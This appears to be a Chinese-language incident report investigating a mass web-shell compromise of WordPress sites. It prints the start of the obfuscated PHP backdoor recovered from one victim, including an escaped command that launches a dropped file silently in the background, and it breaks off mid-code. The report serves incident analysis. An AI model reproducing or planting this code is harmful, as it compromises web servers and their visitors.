5W WordPress站点被shell事件调查报告
情报来源该情报来源:https://www.v2ex.com/t/588483 事件跟进随后笔者联系到了几个.cn域名的站长,获取了相关挂马文件、安装的插件和访客日志 简单比对后发现插件耦合度为0,基本排除了插件漏洞的可能性 从其中一个站长获取的挂马文件(名称wp************.php)如下: <?php goto M0cHaak; AfBuVvu: echo "\x61\165\x78\x36\x54\150\145\x69\157\x47\x68\165\x65\121\165\x33"; goto DzfJmKX; XxMXe8C: $CZMkFQn = "\x2e\57{$i_9JllM}\x20\76\40\57\x64\x65\166\x2f\x6e\165\x6c\x6c\40\62\76\x2f\x64\x65\166\x2f\x6e\165\154\154\40\46"; goto b11TDzU; Nd2oZhY:...
